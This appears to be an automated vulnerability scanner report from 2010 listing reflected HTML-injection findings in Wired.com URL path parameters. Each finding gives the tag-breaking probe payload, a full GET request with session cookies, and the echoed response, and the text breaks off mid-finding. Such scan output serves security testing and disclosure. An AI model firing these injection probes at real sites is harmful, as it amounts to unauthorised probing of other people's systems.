HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=227 Expires: Mon, 22 Nov 2010 01:11:13 GMT Date: Mon, 22 Nov 2010 01:07:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowserb232f"><a>d682f6a1f4b c_2005"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb267"><a>d1977a34166 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/2005eb267"><a>d1977a34166 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:02 GMT Date: Mon, 22 Nov 2010 01:08:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_2005eb267"><a>d1977a34166"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bcac"><a>862b8130889 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser8bcac"><a>862b8130889/2006 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=229 Expires: Mon, 22 Nov 2010 01:11:12 GMT Date: Mon, 22 Nov 2010 01:07:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser8bcac"><a>862b8130889 c_2006"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6534"><a>0bc59f3675f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/2006d6534"><a>0bc59f3675f HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=221 Expires: Mon, 22 Nov 2010 01:11:44 GMT Date: Mon, 22 Nov 2010 01:08:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_2006d6534"><a>0bc59f3675f"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6336"><a>1e75e0fc687 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowserf6336"><a>1e75e0fc687/2007 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=218 Expires: Mon, 22 Nov 2010 01:11:02 GMT Date: Mon, 22 Nov 2010 01:07:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowserf6336"><a>1e75e0fc687 c_2007"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80e5b"><a>ed4954956 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/200780e5b"><a>ed4954956 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29360 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:01 GMT Date: Mon, 22 Nov 2010 01:08:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_200780e5b"><a>ed4954956"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72ece"><a>46b8f298938 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser72ece"><a>46b8f298938/2008 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=223 Expires: Mon, 22 Nov 2010 01:11:03 GMT Date: Mon, 22 Nov 2010 01:07:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser72ece"><a>46b8f298938 c_2008"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8cfb"><a>82e0732bfb6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/2008b8cfb"><a>82e0732bfb6 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=219 Expires: Mon, 22 Nov 2010 01:12:01 GMT Date: Mon, 22 Nov 2010 01:08:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_2008b8cfb"><a>82e0732bfb6"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f096d"><a>05f757fa8c9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowserf096d"><a>05f757fa8c9/2009 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=233 Expires: Mon, 22 Nov 2010 01:11:07 GMT Date: Mon, 22 Nov 2010 01:07:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowserf096d"><a>05f757fa8c9 c_2009"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f59a"><a>29622920453 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/20095f59a"><a>29622920453 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:11:58 GMT Date: Mon, 22 Nov 2010 01:07:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_20095f59a"><a>29622920453"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3559f"><a>424f9e8e273 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue3559f"><a>424f9e8e273/15-06/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=238 Expires: Mon, 22 Nov 2010 01:11:11 GMT Date: Mon, 22 Nov 2010 01:07:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue3559f"><a>424f9e8e273 c_15-06"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c00d"><a>15f409df6f7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/15-063c00d"><a>15f409df6f7/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=229 Expires: Mon, 22 Nov 2010 01:11:44 GMT Date: Mon, 22 Nov 2010 01:07:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_15-063c00d"><a>15f409df6f7"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 458e2"><a>0f61dc79ea2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue458e2"><a>0f61dc79ea2/15-07/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=236 Expires: Mon, 22 Nov 2010 01:09:46 GMT Date: Mon, 22 Nov 2010 01:05:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue458e2"><a>0f61dc79ea2 c_15-07"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e036a"><a>caa87d80c1e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/15-07e036a"><a>caa87d80c1e/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:10:36 GMT Date: Mon, 22 Nov 2010 01:06:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_15-07e036a"><a>caa87d80c1e"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1de8c"><a>8e425fd640 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue1de8c"><a>8e425fd640/15-08/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29351 Vary: Accept-Encoding Cache-Control: max-age=221 Expires: Mon, 22 Nov 2010 01:09:02 GMT Date: Mon, 22 Nov 2010 01:05:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue1de8c"><a>8e425fd640 c_15-08"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cf8b"><a>fce6565d5ba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/15-086cf8b"><a>fce6565d5ba/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:10:06 GMT Date: Mon, 22 Nov 2010 01:06:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_15-086cf8b"><a>fce6565d5ba"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3418"><a>ce195589fa5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issuee3418"><a>ce195589fa5/15-09/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=223 Expires: Mon, 22 Nov 2010 01:09:07 GMT Date: Mon, 22 Nov 2010 01:05:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issuee3418"><a>ce195589fa5 c_15-09"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2054"><a>b50705ffc44 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/15-09a2054"><a>b50705ffc44/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:10:14 GMT Date: Mon, 22 Nov 2010 01:06:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_15-09a2054"><a>b50705ffc44"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7378"><a>52f5bbca6a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
